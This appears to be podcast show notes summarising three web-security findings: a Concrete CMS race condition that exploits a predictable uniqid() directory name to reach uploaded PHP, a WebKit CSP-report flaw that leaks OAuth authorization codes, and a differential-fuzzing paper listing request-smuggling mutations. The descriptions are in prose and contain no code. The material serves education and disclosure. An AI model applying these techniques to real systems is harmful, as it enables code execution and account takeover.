101 - Big Bounties by Exploiting WebKit's CSP & Concrete CMS Bugs
Weak randomness leading to a predictable filename enabling code execution…
In an already risky feature, a limited user can download remote files, providing the URL to Concrete CMS, and it will curl
the file with a 60 second timeout. While the CMS does try to ensure the user is not uploading ant .php
files which might result in code execution these checks happen after the file has already been downloaded.
If the check fails, the file (which is in a VolatileDirectory
) is deleted with the directory when the object is destroyed (effectively the end of the request).
The VolatileDirectory
’s name is made somewhat random through uniqid()
which is influenced by the current time and microseconds. An attacker must guess the directory name before the request ends, the seconds would be predictable based on the server’s Date
header, but the microseconds would leave another million possibilities. So 1 million maximum requests inside the 60 second request life.
The author was able to do this using Turbo Intruder heading 16k-17k requests per second, so 500-700k in the 30second window their attack script was working with.
Root issue is that WebKit violates the specification for Content-Security-Policy (CSP) violation reports, leaking the destination of a violating redirect rather than the origin in the documentURI
field of the report.
This may sound like a rather benign issue, but it can be used to great effect against OAuth implementations for example. During a normal OAuth authorization code flow, once a user has been validated by the OAuth provider (like Google, Facebook, Apple, etc) they will be redirected back to the source application with an authorization code in the URL parameters. If that redirection causes a CSP violation, the report generated for it will leak the authorization code on WebKit-based browsers.
An attacker can create this situation through a maliciously crafted CSP policy on their own page, that allows a request to the authentication provider, but not to the final redirect destination, and set themselves up to catch violation report, leaking the authorization code when the violation happens.
This does require that the victim-page automatically redirect without user-interaction, this is a normally the situation when a user has previously authorized the application, but otherwise is fairly effective. This is also dependent on the victim user visiting an attacker controlled page, but given that the attack itself does not need to be targeted at a specific user, its still quite damaging.
This paper successfully looks at applying differential fuzzing to find potential methods of introducing a parsing desync leading to request smuggling.
Much of the recent up-tick in request smuggling issues has been due to a desync between how the entrypoint server such as a load balance, and the backend server parse requests. The content-type
and transfer-encoding
headers have been the primary focus of these attacks.
What these authors sought to do was to discover other ways of introducing a desync that could result in request smuggling. They did this through differential fuzzing. They created a grammar based fuzzer and then looking for differences between responses when the request was made against different server pairs (differential fuzzing).
While they do detail exactly which server pairs were vulnerable to what type of corruption, I think the mutations themselves (pages 7-8) were the most interesting part of the paper as often you won’t know what servers are involved.
Request Line Mutations
- Managed Method
- Distroted Protocol
- Invalid Version
- Manipulated Termination
- Embedded Request Lines
Request Headers Mutations
- Distorted Header Value
- Manipulated Termination
- Expect Header
- Identity Encoding
- V1.0 Chunked Encoding
- Double Transfer-Encoding
Request Body Mutations
- Chunk-Size Chunk-Data Mismatch
- Manipulated Chunk-Size Termination
- Manipulated Chunk-Extension Termination
- Manipulated Chunk-Data Termination
- Mangled Last-Chunk
Using these mutations there did find several server pairs that were vulnerable to request smuggling, largely it seemed like Akamai was the odd one out being involved with most of the issues discovered, the results are graphed on page 10.